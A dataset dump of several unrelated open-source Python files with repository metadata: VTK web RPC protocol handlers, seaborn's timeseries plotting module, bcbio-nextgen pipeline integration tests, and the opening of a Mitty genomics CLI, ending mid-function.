self.Application.GetObjectIdMap().SetActiveObject("VIEW", view)
# =============================================================================
#
# Handle Mouse interaction on any type of view
#
# =============================================================================
class vtkWebMouseHandler(vtkWebProtocol):
@exportRpc("viewport.mouse.interaction")
def mouseInteraction(self, event):
"""
RPC Callback for mouse interactions.
"""
view = self.getView(event['view'])
buttons = 0
if event["buttonLeft"]:
buttons |= vtkWebInteractionEvent.LEFT_BUTTON;
if event["buttonMiddle"]:
buttons |= vtkWebInteractionEvent.MIDDLE_BUTTON;
if event["buttonRight"]:
buttons |= vtkWebInteractionEvent.RIGHT_BUTTON;
modifiers = 0
if event["shiftKey"]:
modifiers |= vtkWebInteractionEvent.SHIFT_KEY
if event["ctrlKey"]:
modifiers |= vtkWebInteractionEvent.CTRL_KEY
if event["altKey"]:
modifiers |= vtkWebInteractionEvent.ALT_KEY
if event["metaKey"]:
modifiers |= vtkWebInteractionEvent.META_KEY
pvevent = vtkWebInteractionEvent()
pvevent.SetButtons(buttons)
pvevent.SetModifiers(modifiers)
if event.has_key("x"):
pvevent.SetX(event["x"])
if event.has_key("y"):
pvevent.SetY(event["y"])
if event.has_key("scroll"):
pvevent.SetScroll(event["scroll"])
if event["action"] == 'dblclick':
pvevent.SetRepeatCount(2)
#pvevent.SetKeyCode(event["charCode"])
retVal = self.getApplication().HandleInteractionEvent(view, pvevent)
del pvevent
if retVal:
self.getApplication().InvokeEvent('PushRender')
return retVal
# =============================================================================
#
# Basic 3D Viewport API (Camera + Orientation + CenterOfRotation
#
# =============================================================================
class vtkWebViewPort(vtkWebProtocol):
@exportRpc("viewport.camera.reset")
def resetCamera(self, viewId):
"""
RPC callback to reset camera.
"""
view = self.getView(viewId)
camera = view.GetRenderer().GetActiveCamera()
camera.ResetCamera()
try:
# FIXME seb: view.CenterOfRotation = camera.GetFocalPoint()
print "FIXME"
except:
pass
self.getApplication().InvalidateCache(view)
self.getApplication().InvokeEvent('PushRender')
return str(self.getGlobalId(view))
@exportRpc("viewport.axes.orientation.visibility.update")
def updateOrientationAxesVisibility(self, viewId, showAxis):
"""
RPC callback to show/hide OrientationAxis.
"""
view = self.getView(viewId)
# FIXME seb: view.OrientationAxesVisibility = (showAxis if 1 else 0);
self.getApplication().InvalidateCache(view)
self.getApplication().InvokeEvent('PushRender')
return str(self.getGlobalId(view))
@exportRpc("viewport.axes.center.visibility.update")
def updateCenterAxesVisibility(self, viewId, showAxis):
"""
RPC callback to show/hide CenterAxesVisibility.
"""
view = self.getView(viewId)
# FIXME seb: view.CenterAxesVisibility = (showAxis if 1 else 0);
self.getApplication().InvalidateCache(view)
self.getApplication().InvokeEvent('PushRender')
return str(self.getGlobalId(view))
@exportRpc("viewport.camera.update")
def updateCamera(self, view_id, focal_point, view_up, position):
view = self.getView(view_id)
camera = view.GetRenderer().GetActiveCamera()
camera.SetFocalPoint(focal_point)
camera.SetCameraViewUp(view_up)
camera.SetCameraPosition(position)
self.getApplication().InvalidateCache(view)
self.getApplication().InvokeEvent('PushRender')
# =============================================================================
#
# Provide Image delivery mechanism
#
# =============================================================================
class vtkWebViewPortImageDelivery(vtkWebProtocol):
@exportRpc("viewport.image.render")
def stillRender(self, options):
"""
RPC Callback to render a view and obtain the rendered image.
"""
beginTime = int(round(time() * 1000))
view = self.getView(options["view"])
size = [view.GetSize()[0], view.GetSize()[1]]
resize = size != options.get("size", size)
if resize:
size = options["size"]
if size[0] > 0 and size[1] > 0:
view.SetSize(size)
t = 0
if options and options.has_key("mtime"):
t = options["mtime"]
quality = 100
if options and options.has_key("quality"):
quality = options["quality"]
localTime = 0
if options and options.has_key("localTime"):
localTime = options["localTime"]
reply = {}
app = self.getApplication()
if t == 0:
app.InvalidateCache(view)
reply["image"] = app.StillRenderToString(view, t, quality)
# Check that we are getting image size we have set if not wait until we
# do. The render call will set the actual window size.
tries = 10;
while resize and list(view.GetSize()) != size \
and size != [0, 0] and tries > 0:
app.InvalidateCache(view)
reply["image"] = app.StillRenderToString(view, t, quality)
tries -= 1
reply["stale"] = app.GetHasImagesBeingProcessed(view)
reply["mtime"] = app.GetLastStillRenderToStringMTime()
reply["size"] = [view.GetSize()[0], view.GetSize()[1]]
reply["format"] = "jpeg;base64"
reply["global_id"] = str(self.getGlobalId(view))
reply["localTime"] = localTime
endTime = int(round(time() * 1000))
reply["workTime"] = (endTime - beginTime)
return reply
# =============================================================================
#
# Provide Geometry delivery mechanism (WebGL)
#
# =============================================================================
class vtkWebViewPortGeometryDelivery(vtkWebProtocol):
@exportRpc("viewport.webgl.metadata")
def getSceneMetaData(self, view_id):
view = self.getView(view_id);
data = self.getApplication().GetWebGLSceneMetaData(view)
return data
@exportRpc("viewport.webgl.data")
def getWebGLData(self, view_id, object_id, part):
view = self.getView(view_id)
data = self.getApplication().GetWebGLBinaryData(view, str(object_id), part-1)
return data
# =============================================================================
#
# Provide File/Directory listing
#
# =============================================================================
class vtkWebFileBrowser(vtkWebProtocol):
def __init__(self, basePath, name, excludeRegex=r"^\.|~$|^\$", groupRegex=r"[0-9]+\."):
"""
Configure the way the WebFile browser will expose the server content.
- basePath: specify the base directory that we should start with
- name: Name of that base directory that will show up on the web
- excludeRegex: Regular expression of what should be excluded from the list of files/directories
"""
self.baseDirectory = basePath
self.rootName = name
self.pattern = re.compile(excludeRegex)
self.gPattern = re.compile(groupRegex)
@exportRpc("file.server.directory.list")
def listServerDirectory(self, relativeDir='.'):
"""
RPC Callback to list a server directory relative to the basePath
provided at start-up.
"""
path = [ self.rootName ]
if len(relativeDir) > len(self.rootName):
relativeDir = relativeDir[len(self.rootName)+1:]
path += relativeDir.replace('\\','/').split('/')
currentPath = os.path.join(self.baseDirectory, relativeDir)
result = { 'label': relativeDir, 'files': [], 'dirs': [], 'groups': [], 'path': path }
if relativeDir == '.':
result['label'] = self.rootName
for file in os.listdir(currentPath):
if os.path.isfile(os.path.join(currentPath, file)) and not re.search(self.pattern, file):
result['files'].append({'label': file, 'size': -1})
elif os.path.isdir(os.path.join(currentPath, file)) and not re.search(self.pattern, file):
result['dirs'].append(file)
# Filter files to create groups
files = result['files']
files.sort()
groups = result['groups']
groupIdx = {}
filesToRemove = []
for file in files:
fileSplit = re.split(self.gPattern, file['label'])
if len(fileSplit) == 2:
filesToRemove.append(file)
gName = '*.'.join(fileSplit)
if groupIdx.has_key(gName):
groupIdx[gName]['files'].append(file['label'])
else:
groupIdx[gName] = { 'files' : [file['label']], 'label': gName }
groups.append(groupIdx[gName])
for file in filesToRemove:
gName = '*.'.join(re.split(self.gPattern, file['label']))
if len(groupIdx[gName]['files']) > 1:
files.remove(file)
else:
groups.remove(groupIdx[gName])
return result
|
keithroe/vtkoptix
|
Web/Python/vtk/web/protocols.py
|
Python
|
bsd-3-clause
| 11,606
|
[
"VTK"
] |
80826b171b3126ee1e2163c853ebe5e0821611bf4fa17f08812c55ae6c719683
|
"""Timeseries plotting functions."""
from __future__ import division
import numpy as np
import pandas as pd
from scipy import stats, interpolate
import matplotlib as mpl
import matplotlib.pyplot as plt
from .external.six import string_types
from . import utils
from . import algorithms as algo
from .palettes import color_palette
def tsplot(data, time=None, unit=None, condition=None, value=None,
err_style="ci_band", ci=68, interpolate=True, color=None,
estimator=np.mean, n_boot=5000, err_palette=None, err_kws=None,
legend=True, ax=None, **kwargs):
"""Plot one or more timeseries with flexible representation of uncertainty.
This function can take data specified either as a long-form (tidy)
DataFrame or as an ndarray with dimensions for sampling unit, time, and
(optionally) condition. The interpretation of some of the other parameters
changes depending on the type of object passed as data.
Parameters
----------
data : DataFrame or ndarray
Data for the plot. Should either be a "long form" dataframe or an
array with dimensions (unit, time, condition). In both cases, the
condition field/dimension is optional. The type of this argument
determines the interpretation of the next few parameters.
time : string or series-like
Either the name of the field corresponding to time in the data
DataFrame or x values for a plot when data is an array. If a Series,
the name will be used to label the x axis.
unit : string
Field in the data DataFrame identifying the sampling unit (e.g.
subject, neuron, etc.). The error representation will collapse over
units at each time/condition observation. This has no role when data
is an array.
value : string
Either the name of the field corresponding to the data values in
the data DataFrame (i.e. the y coordinate) or a string that forms
the y axis label when data is an array.
condition : string or Series-like
Either the name of the field identifying the condition an observation
falls under in the data DataFrame, or a sequence of names with a length
equal to the size of the third dimension of data. There will be a
separate trace plotted for each condition. If condition is a Series
with a name attribute, the name will form the title for the plot
legend (unless legend is set to False).
err_style : string or list of strings or None
Names of ways to plot uncertainty across units from set of
{ci_band, ci_bars, boot_traces, boot_kde, unit_traces, unit_points}.
Can use one or more than one method.
ci : float or list of floats in [0, 100]
Confidence interaval size(s). If a list, it will stack the error
plots for each confidence interval. Only relevant for error styles
with "ci" in the name.
interpolate : boolean
Whether to do a linear interpolation between each timepoint when
plotting. The value of this parameter also determines the marker
used for the main plot traces, unless marker is specified as a keyword
argument.
color : seaborn palette or matplotlib color name or dictionary
Palette or color for the main plots and error representation (unless
plotting by unit, which can be separately controlled with err_palette).
If a dictionary, should map condition name to color spec.
estimator : callable
Function to determine central tendency and to pass to bootstrap
must take an ``axis`` argument.
n_boot : int
Number of bootstrap iterations.
err_palette: seaborn palette
Palette name or list of colors used when plotting data for each unit.
err_kws : dict, optional
Keyword argument dictionary passed through to matplotlib function
generating the error plot,
ax : axis object, optional
Plot in given axis; if None creates a new figure
kwargs :
Other keyword arguments are passed to main plot() call
Returns
-------
ax : matplotlib axis
axis with plot data
"""
# Sort out default values for the parameters
if ax is None:
ax = plt.gca()
if err_kws is None:
err_kws = {}
# Handle different types of input data
if isinstance(data, pd.DataFrame):
xlabel = time
ylabel = value
# Condition is optional
if condition is None:
condition = pd.Series(np.ones(len(data)))
legend = False
legend_name = None
n_cond = 1
else:
legend = True and legend
legend_name = condition
n_cond = len(data[condition].unique())
else:
data = np.asarray(data)
# Data can be a timecourse from a single unit or
# several observations in one condition
if data.ndim == 1:
data = data[np.newaxis, :, np.newaxis]
elif data.ndim == 2:
data = data[:, :, np.newaxis]
n_unit, n_time, n_cond = data.shape
# Units are experimental observations. Maybe subjects, or neurons
if unit is None:
units = np.arange(n_unit)
unit = "unit"
units = np.repeat(units, n_time * n_cond)
ylabel = None
# Time forms the xaxis of the plot
if time is None:
times = np.arange(n_time)
else:
times = np.asarray(time)
xlabel = None
if hasattr(time, "name"):
xlabel = time.name
time = "time"
times = np.tile(np.repeat(times, n_cond), n_unit)
# Conditions split the timeseries plots
if condition is None:
conds = range(n_cond)
legend = False
if isinstance(color, dict):
err = "Must have condition names if using color dict."
raise ValueError(err)
else:
conds = np.asarray(condition)
legend = True and legend
if hasattr(condition, "name"):
legend_name = condition.name
else:
legend_name = None
condition = "cond"
conds = np.tile(conds, n_unit * n_time)
# Value forms the y value in the plot
if value is None:
ylabel = None
else:
ylabel = value
value = "value"
# Convert to long-form DataFrame
data = pd.DataFrame(dict(value=data.ravel(),
time=times,
unit=units,
cond=conds))
# Set up the err_style and ci arguments for the loop below
if isinstance(err_style, string_types):
err_style = [err_style]
elif err_style is None:
err_style = []
if not hasattr(ci, "__iter__"):
ci = [ci]
# Set up the color palette
if color is None:
current_palette = mpl.rcParams["axes.color_cycle"]
if len(current_palette) < n_cond:
colors = color_palette("husl", n_cond)
else:
colors = color_palette(n_colors=n_cond)
elif isinstance(color, dict):
colors = [color[c] for c in data[condition].unique()]
else:
try:
colors = color_palette(color, n_cond)
except ValueError:
color = mpl.colors.colorConverter.to_rgb(color)
colors = [color] * n_cond
# Do a groupby with condition and plot each trace
for c, (cond, df_c) in enumerate(data.groupby(condition, sort=False)):
df_c = df_c.pivot(unit, time, value)
x = df_c.columns.values.astype(np.float)
# Bootstrap the data for confidence intervals
boot_data = algo.bootstrap(df_c.values, n_boot=n_boot,
axis=0, func=estimator)
cis = [utils.ci(boot_data, v, axis=0) for v in ci]
central_data = estimator(df_c.values, axis=0)
# Get the color for this condition
color = colors[c]
# Use subroutines to plot the uncertainty
for style in err_style:
# Allow for null style (only plot central tendency)
if style is None:
continue
# Grab the function from the global environment
try:
plot_func = globals()["_plot_%s" % style]
except KeyError:
raise ValueError("%s is not a valid err_style" % style)
# Possibly set up to plot each observation in a different color
if err_palette is not None and "unit" in style:
orig_color = color
color = color_palette(err_palette, len(df_c.values))
# Pass all parameters to the error plotter as keyword args
plot_kwargs = dict(ax=ax, x=x, data=df_c.values,
boot_data=boot_data,
central_data=central_data,
color=color, err_kws=err_kws)
# Plot the error representation, possibly for multiple cis
for ci_i in cis:
plot_kwargs["ci"] = ci_i
plot_func(**plot_kwargs)
if err_palette is not None and "unit" in style:
color = orig_color
# Plot the central trace
kwargs.setdefault("marker", "" if interpolate else "o")
ls = kwargs.pop("ls", "-" if interpolate else "")
kwargs.setdefault("linestyle", ls)
label = cond if legend else "_nolegend_"
ax.plot(x, central_data, color=color, label=label, **kwargs)
# Pad the sides of the plot only when not interpolating
ax.set_xlim(x.min(), x.max())
x_diff = x[1] - x[0]
if not interpolate:
ax.set_xlim(x.min() - x_diff, x.max() + x_diff)
# Add the plot labels
if xlabel is not None:
ax.set_xlabel(xlabel)
if ylabel is not None:
ax.set_ylabel(ylabel)
if legend:
ax.legend(loc=0, title=legend_name)
return ax
# Subroutines for tsplot errorbar plotting
# ----------------------------------------
def _plot_ci_band(ax, x, ci, color, err_kws, **kwargs):
"""Plot translucent error bands around the central tendancy."""
low, high = ci
if "alpha" not in err_kws:
err_kws["alpha"] = 0.2
ax.fill_between(x, low, high, color=color, **err_kws)
def _plot_ci_bars(ax, x, central_data, ci, color, err_kws, **kwargs):
"""Plot error bars at each data point."""
for x_i, y_i, (low, high) in zip(x, central_data, ci.T):
ax.plot([x_i, x_i], [low, high], color=color,
solid_capstyle="round", **err_kws)
def _plot_boot_traces(ax, x, boot_data, color, err_kws, **kwargs):
"""Plot 250 traces from bootstrap."""
err_kws.setdefault("alpha", 0.25)
err_kws.setdefault("linewidth", 0.25)
if "lw" in err_kws:
err_kws["linewidth"] = err_kws.pop("lw")
ax.plot(x, boot_data.T, color=color, label="_nolegend_", **err_kws)
def _plot_unit_traces(ax, x, data, ci, color, err_kws, **kwargs):
"""Plot a trace for each observation in the original data."""
if isinstance(color, list):
if "alpha" not in err_kws:
err_kws["alpha"] = .5
for i, obs in enumerate(data):
ax.plot(x, obs, color=color[i], label="_nolegend_", **err_kws)
else:
if "alpha" not in err_kws:
err_kws["alpha"] = .2
ax.plot(x, data.T, color=color, label="_nolegend_", **err_kws)
def _plot_unit_points(ax, x, data, color, err_kws, **kwargs):
"""Plot each original data point discretely."""
if isinstance(color, list):
for i, obs in enumerate(data):
ax.plot(x, obs, "o", color=color[i], alpha=0.8, markersize=4,
label="_nolegend_", **err_kws)
else:
ax.plot(x, data.T, "o", color=color, alpha=0.5, markersize=4,
label="_nolegend_", **err_kws)
def _plot_boot_kde(ax, x, boot_data, color, **kwargs):
"""Plot the kernal density estimate of the bootstrap distribution."""
kwargs.pop("data")
_ts_kde(ax, x, boot_data, color, **kwargs)
def _plot_unit_kde(ax, x, data, color, **kwargs):
"""Plot the kernal density estimate over the sample."""
_ts_kde(ax, x, data, color, **kwargs)
def _ts_kde(ax, x, data, color, **kwargs):
"""Upsample over time and plot a KDE of the bootstrap distribution."""
kde_data = []
y_min, y_max = data.min(), data.max()
y_vals = np.linspace(y_min, y_max, 100)
upsampler = interpolate.interp1d(x, data)
data_upsample = upsampler(np.linspace(x.min(), x.max(), 100))
for pt_data in data_upsample.T:
pt_kde = stats.kde.gaussian_kde(pt_data)
kde_data.append(pt_kde(y_vals))
kde_data = np.transpose(kde_data)
rgb = mpl.colors.ColorConverter().to_rgb(color)
img = np.zeros((kde_data.shape[0], kde_data.shape[1], 4))
img[:, :, :3] = rgb
kde_data /= kde_data.max(axis=0)
kde_data[kde_data > 1] = 1
img[:, :, 3] = kde_data
ax.imshow(img, interpolation="spline16", zorder=2,
extent=(x.min(), x.max(), y_min, y_max),
aspect="auto", origin="lower")
|
cwu2011/seaborn
|
seaborn/timeseries.py
|
Python
|
bsd-3-clause
| 13,239
|
[
"NEURON"
] |
ee9439b7deb1dd8a99e6cfb87c578de3df2a8f34d29177d1d81358aedd4be091
|
"""This directory is setup with configurations to run the main functional test.
It exercises a full analysis pipeline on a smaller subset of data.
"""
import os
import subprocess
import unittest
import shutil
import contextlib
import collections
import functools
from nose import SkipTest
from nose.plugins.attrib import attr
import yaml
from bcbio.pipeline.config_utils import load_system_config
@contextlib.contextmanager
def make_workdir():
remove_old_dir = True
#remove_old_dir = False
dirname = os.path.join(os.path.dirname(__file__), "test_automated_output")
if remove_old_dir:
if os.path.exists(dirname):
shutil.rmtree(dirname)
os.makedirs(dirname)
orig_dir = os.getcwd()
try:
os.chdir(dirname)
yield dirname
finally:
os.chdir(orig_dir)
def expected_failure(test):
"""Small decorator to mark tests as expected failure.
Useful for tests that are work-in-progress.
"""
@functools.wraps(test)
def inner(*args, **kwargs):
try:
test(*args, **kwargs)
except Exception:
raise SkipTest
else:
raise AssertionError('Failure expected')
return inner
def get_post_process_yaml(data_dir, workdir):
"""Prepare a bcbio_system YAML file pointing to test data.
"""
try:
from bcbiovm.docker.defaults import get_datadir
datadir = get_datadir()
system = os.path.join(datadir, "galaxy", "bcbio_system.yaml") if datadir else None
except ImportError:
system = None
if system is None or not os.path.exists(system):
try:
_, system = load_system_config("bcbio_system.yaml")
except ValueError:
system = None
if system is None or not os.path.exists(system):
system = os.path.join(data_dir, "post_process-sample.yaml")
# create local config pointing to reduced genomes
test_system = os.path.join(workdir, "bcbio_system.yaml")
with open(system) as in_handle:
config = yaml.load(in_handle)
config["galaxy_config"] = os.path.join(data_dir, "universe_wsgi.ini")
with open(test_system, "w") as out_handle:
yaml.dump(config, out_handle)
return test_system
class AutomatedAnalysisTest(unittest.TestCase):
"""Setup a full automated analysis and run the pipeline.
"""
def setUp(self):
self.data_dir = os.path.join(os.path.dirname(__file__), "data", "automated")
def _install_test_files(self, data_dir):
"""Download required sequence and reference files.
"""
DlInfo = collections.namedtuple("DlInfo", "fname dirname version")
download_data = [DlInfo("110106_FC70BUKAAXX.tar.gz", None, None),
DlInfo("genomes_automated_test.tar.gz", "genomes", 27),
DlInfo("110907_ERP000591.tar.gz", None, None),
DlInfo("100326_FC6107FAAXX.tar.gz", None, 9),
DlInfo("tcga_benchmark.tar.gz", None, 3)]
for dl in download_data:
url = "http://chapmanb.s3.amazonaws.com/{fname}".format(fname=dl.fname)
dirname = os.path.join(data_dir, os.pardir,
dl.fname.replace(".tar.gz", "") if dl.dirname is None
else dl.dirname)
if os.path.exists(dirname) and dl.version is not None:
version_file = os.path.join(dirname, "VERSION")
is_old = True
if os.path.exists(version_file):
with open(version_file) as in_handle:
version = int(in_handle.read())
is_old = version < dl.version
if is_old:
shutil.rmtree(dirname)
if not os.path.exists(dirname):
self._download_to_dir(url, dirname)
def _download_to_dir(self, url, dirname):
print dirname
cl = ["wget", url]
subprocess.check_call(cl)
cl = ["tar", "-xzvpf", os.path.basename(url)]
subprocess.check_call(cl)
shutil.move(os.path.basename(dirname), dirname)
os.remove(os.path.basename(url))
@attr(speed=3)
def IGNOREtest_3_full_pipeline(self):
"""Run full automated analysis pipeline with multiplexing.
XXX Multiplexing not supporting in latest versions.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110106_FC70BUKAAXX"),
os.path.join(self.data_dir, "run_info.yaml")]
subprocess.check_call(cl)
@attr(speed=3)
def IGNOREtest_4_empty_fastq(self):
"""Handle analysis of empty fastq inputs from failed runs.
XXX Multiplexing not supporting in latest versions.
"""
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110221_empty_FC12345AAXX"),
os.path.join(self.data_dir, "run_info-empty.yaml")]
subprocess.check_call(cl)
@attr(stranded=True)
@attr(rnaseq=True)
def test_2_stranded(self):
"""Run an RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_stranded"),
os.path.join(self.data_dir, "run_info-stranded.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(tophat=True)
def test_2_rnaseq(self):
"""Run an RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-rnaseq.yaml")]
subprocess.check_call(cl)
@attr(fusion=True)
def test_2_fusion(self):
"""Run an RNA-seq analysis and test fusion genes
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_fusion"),
os.path.join(self.data_dir, "run_info-fusion.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(rnaseq_standard=True)
@attr(star=True)
def test_2_star(self):
"""Run an RNA-seq analysis with STAR and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-star.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(rnaseq_standard=True)
@attr(hisat2=True)
def test_2_hisat2(self):
"""Run an RNA-seq analysis with hisat2 and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-hisat2.yaml")]
subprocess.check_call(cl)
@attr(explant=True)
@attr(singleend=True)
@attr(rnaseq=True)
def test_explant(self):
"""
Run an explant RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "1_explant"),
os.path.join(self.data_dir, "run_info-explant.yaml")]
subprocess.check_call(cl)
@attr(srnaseq=True)
@attr(srnaseq_star=True)
def test_srnaseq_star(self):
"""Run an sRNA-seq analysis.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-srnaseq_star.yaml")]
subprocess.check_call(cl)
@attr(srnaseq=True)
@attr(srnaseq_bowtie=True)
def test_srnaseq_bowtie(self):
"""Run an sRNA-seq analysis.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-srnaseq_bowtie.yaml")]
subprocess.check_call(cl)
@attr(chipseq=True)
def test_chipseq(self):
"""
Run a chip-seq alignment with Bowtie2
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_chipseq"),
os.path.join(self.data_dir, "run_info-chipseq.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(ensemble=True)
def test_1_variantcall(self):
"""Test variant calling with GATK pipeline.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-variantcall.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(devel=True)
def test_5_bam(self):
"""Allow BAM files as input to pipeline.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-bam.yaml")]
subprocess.check_call(cl)
@attr(speed=2)
def test_6_bamclean(self):
"""Clean problem BAM input files that do not require alignment.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bamclean.yaml")]
subprocess.check_call(cl)
@attr(speed=2)
@attr(cancer=True)
@attr(cancermulti=True)
def test_7_cancer(self):
"""Test paired tumor-normal calling using multiple calling approaches: MuTect, VarScan, FreeBayes.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-cancer.yaml")]
subprocess.check_call(cl)
@attr(cancer=True)
@attr(cancerpanel=True)
def test_7_cancer_nonormal(self):
"""Test cancer calling without normal samples or with normal VCF panels.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-cancer2.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(template=True)
def test_8_template(self):
"""Create a project template from input files and metadata configuration.
"""
self._install_test_files(self.data_dir)
fc_dir = os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX")
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py", "-w", "template", "--only-metadata",
"freebayes-variant",
os.path.join(fc_dir, "100326.csv"),
os.path.join(fc_dir, "7_100326_FC6107FAAXX_1_fastq.txt"),
os.path.join(fc_dir, "7_100326_FC6107FAAXX_2_fastq.txt"),
os.path.join(fc_dir, "8_100326_FC6107FAAXX.bam")]
subprocess.check_call(cl)
@attr(joint=True)
def test_9_joint(self):
"""Perform joint calling/backfilling/squaring off following variant calling.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-joint.yaml")]
subprocess.check_call(cl)
@attr(docker=True)
def test_docker(self):
"""Run an analysis with code and tools inside a docker container.
Requires https://github.com/chapmanb/bcbio-nextgen-vm
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_vm.py",
"--datadir=%s" % self.data_dir,
"run",
"--systemconfig=%s" % get_post_process_yaml(self.data_dir, workdir),
"--fcdir=%s" % os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bam.yaml")]
subprocess.check_call(cl)
@attr(docker_ipython=True)
def test_docker_ipython(self):
"""Run an analysis with code and tools inside a docker container, driven via IPython.
Requires https://github.com/chapmanb/bcbio-nextgen-vm
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_vm.py",
"--datadir=%s" % self.data_dir,
"ipython",
"--systemconfig=%s" % get_post_process_yaml(self.data_dir, workdir),
"--fcdir=%s" % os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-bam.yaml"),
"lsf", "localrun"]
subprocess.check_call(cl)
class CWLTest(unittest.TestCase):
""" Run simple CWL workflows.
Requires https://github.com/chapmanb/bcbio-nextgen-vm
"""
def setUp(self):
self.data_dir = os.path.join(os.path.dirname(__file__), "data", "automated")
@attr(speed=2)
@attr(cwl=True)
@attr(cwl_local=True)
def test_1_cwl_local(self):
"""Create a common workflow language description and run on local installation.
"""
with make_workdir() as workdir:
cl = ["bcbio_vm.py", "cwl", "../data/automated/run_info-cwl.yaml",
"--systemconfig", get_post_process_yaml(self.data_dir, workdir)]
subprocess.check_call(cl)
out_base = "run_info-cwl-workflow/main-run_info-cwl"
cl = ["cwltool", "--verbose", "--preserve-environment", "PATH", "HOME", "--no-container",
out_base + ".cwl", out_base + "-samples.json"]
subprocess.check_call(cl)
print
print "To run with a CWL tool, cd test_automated_output and:"
print " ".join(cl)
@attr(speed=2)
@attr(cwl=True)
@attr(cwl_docker=True)
def test_2_cwl_docker(self):
"""Create a common workflow language description and run on a Docker installation.
"""
with make_workdir() as workdir:
cl = ["bcbio_vm.py", "cwl", "../data/automated/run_info-cwl.yaml",
"--systemconfig", get_post_process_yaml(self.data_dir, workdir)]
subprocess.check_call(cl)
out_base = "run_info-cwl-workflow/main-run_info-cwl"
cl = ["cwltool", "--verbose", out_base + ".cwl", out_base + "-samples.json"]
subprocess.check_call(cl)
print
print "To run with a CWL tool, cd test_automated_output and:"
print " ".join(cl)
|
gifford-lab/bcbio-nextgen
|
tests/test_automated_analysis.py
|
Python
|
mit
| 16,978
|
[
"Galaxy"
] |
8ebacfc151a45e3a564a4d553de9e8216da9d3e02d9c0885c04df5367ca7a2ed
|
import logging
import os
import click
logger = logging.getLogger(__name__)
@click.group()
@click.version_option()
@click.option('-v', '--verbose', type=int, default=0)
def cli(verbose):
"""A genomic data simulator for testing and debugging bio-informatics tools"""
logging.basicConfig(level=[
logging.ERROR,
logging.WARNING,
logging.INFO,
logging.DEBUG
][min(verbose, 3)])
import pkg_resources # part of setuptools
version = pkg_resources.require("Mitty")[0].version
logger.debug('Mitty version {}'.format(version))
@cli.command('filter-variants', short_help='Remove complex variants from VCF')
@click.argument('vcfin', type=click.Path(exists=True))
@click.argument('sample')
@click.argument('bed')
@click.argument('vcfout', type=click.Path())
def filter_vcf(vcfin, sample, bed, vcfout):
"""Subset VCF for given sample, apply BED file and filter out complex variants
making it suitable to use for read generation"""
import mitty.lib.vcfio as mvio
